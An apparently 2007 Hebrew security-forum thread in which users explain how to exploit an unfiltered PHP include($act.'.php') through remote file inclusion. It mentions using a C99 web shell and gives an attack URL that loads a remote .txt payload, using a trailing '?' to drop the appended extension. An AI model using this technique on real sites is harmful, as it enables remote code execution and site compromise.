include($act.".php");
הACT בא מהכתובת.. ולא עובר שום סינון ושום IF...
יש דרך לנצל את זה בתור RFI?
ואם לא.. אז איך אפשר לנצל את זה?
ראשי > אבטחת מידע > שאלה על RFI
include($act.".php");
הACT בא מהכתובת.. ולא עובר שום סינון ושום IF...
יש דרך לנצל את זה בתור RFI?
ואם לא.. אז איך אפשר לנצל את זה?
ואז אתה נותן בכתובת את הכתובת של הPHP אבל בלי הסיומת..
תעלה לשרת קובץ בבלי סיומת
את הקובץ C99 או משהו.. איזהשהו shell
ואז תשים אותו ב act בלי הסיומת זה שם סיומת אוטומטית..
ניסיתי להעלות לנענע (הם לא תומכים בPHP) ולהכניס לשם את זה.. אבל זה לא עובד.. הוא פשוט לא מראה כלום..
אבל משום מה גם כשאני נכנס רגיל לעמוד הזה בPHP שבניתי.. נענע מציגים לי שגיאה שהעמוד לא קיים.. אבל אני רואה אותו בלוח בקרה בנענע...
ותדאג שהוא יחזיר מיים טייפ
text\ascii
כמובן זה צריך להיות דף PHP, אבל כשאתה פותח אותו באקספלורר אתה אמור לראות את הקוד, ולא את הפלט.
זה אמור לעבוד
בהצלחה.
הוא ישלב אותו עם סיומת PHP.. והסיומת כידוע היא חלק מהשם.. אז הוא פשוט לא ימצא את הקובץ אם אני לא טועה
הכוונה היא שהקובץ יהיה
.php
אבל בפלט שלו חייב לחזור, קוד PHP ,ולא פלט של הדף PHP ...
...
בתור קלט למערכת תכניס את הנתיב לקובץ, ללא .php...
כזכור לי לשניהם אמורות להיות תגית PHP
אבל תעשה משהוא בסגנון
קוד:echo <<<EOF;
<? ..........................
................................
echo "mowhwhw hacked.";
?>
EOF;
אל תקח אותי בתחביר... אם זה מפחיד אותך אז תדע שיש כזה תחביר מגניב שמאפשר לך לכתוב בלי הגבלה בתוך קוד PHP בצורה הנ"ל (www.php.net)
בקיצור,
כשאתה פותח קובץ PHP מקומים בנוטפאד, שזה יראה כמו קובץ על השרת באקספלורר.
X זה איך אתה לא צריך לעשות
V זה איך אתה צריך לעשות
============================
X: שם הקובץ index.php
V: שם הקובץ: index
=====
X: לא לשים תגיות פתיחה וסגירה
V: לשים תגיות פתיחה וסגירה
========
מקווה שהבנת שאתה צריך להכין את הקובץ אם הקודים ממש של PHP
רק לא לשים סיומת של PHP שאתה שומר את הקובץ..
=== :]
נ.ב עדיין לא אישרת אותי באייסי חח..
קוד:include($act.".php");
הקובץ שלך חייב להסתיים ב
.php
אתה לא רואה שב include יש כבר את הסיומת..
אתה פשוט צריך לשים ב act את הקובץ ללא הסיומת
וזה יצא השם של הקובץ הנכון..
אם תכתוב ב act
index.php אז זה יעשה include לקובץ: index.php.php
אם תעשה include לקובץ index
זה יצא index.php
מקווה שהבנת..
אבל אני מצטט אותך
"
רק לא לשים סיומת של PHP שאתה שומר את הקובץ..
"
מסכים שב act= אמור להיות השם ללא הסיומת.
אולי זה בגלל השרת הדפוק של נענע.. יש למישהו שרת אחר שלא תומך בPHP?
ולהלל.. לא הבנתי תקטע עם הEOF והחצים..
יש מצב אתה מסביר לי על זה? או שזה לא חשוב ולא קשור לנושא?
האיסיי 227728 שלח לי אותו..
או שתעלה פה קישור אל הקובץ...
יש מצב לשרת אחר? כי יכול להיות שהבעיה היא בנענע..
קוד:
<?
echo ’<?
echo "Cool";
?>’;
?>
וזה גם לא עזר..
יש למישהו רעיון?
*עריכה*
וזה בקוד מציג איך שזה אמור להיות
שאני מפעיל את הקובץ זה מציג:
קוד:
<?
echo "Cool";
?>
כמו שזה אמור להיות..
אבל בשרת עצמו שיש את ה include זה לא מראה משום מה..
רעיונות[?!][ההודעה נערכה על-ידי masternetwork ב-16/03/2007 00:16:49]
קוד:
<?php
echo "Ouch";
?>
ואז תכנס לאתר שלך ככה:
קוד:http://host/index.php?act=http://planetnana.co.il/user/phpinj.txt?
*אל תשכח את ה "?".[ההודעה נערכה על-ידי SkOd ב-16/03/2007 07:10:11]
דרך אגב פלנט נענע סאקס, שים על שרת אחר (ועכשיו אתה יכול גם TXT תודות ל SKOD)
ואם הבנתי נכון אז הפונקציה die
אמורה לעזור לך לא?